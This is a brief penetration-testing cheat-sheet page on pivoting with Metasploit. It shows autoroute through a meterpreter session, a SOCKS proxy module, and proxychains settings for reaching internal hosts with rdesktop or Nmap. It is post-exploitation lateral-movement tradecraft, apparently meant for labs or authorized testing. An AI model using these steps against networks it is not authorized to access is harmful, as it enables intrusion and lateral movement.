Metasploit Tunneling

Must have an established shell on the jumping system (that reaching other subnet victim)

The autoroute module creates a reverse tunnel and allows us to direct network traffic into the appropriate subnet.

@multihandler shell session

background
use multi/manage/autoroute
set session 1 (the meterpreter shell session)
exploit

use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
exploit -j

sudo bash -c 'echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf'

We can configure to force TCP traffic through the proxy by adding the SOCKS4 proxy IP and port to the config file.

sudo bash -c 'echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf'

proxychains rdesktop 192.168.120.10

Proxychains can be used with many other applications. For example, we can use Nmap to conduct an internal network scan or Firefox to browse internal web sites.

PreviousWindows Lateral Movement NextChisel

Last updated 9 months ago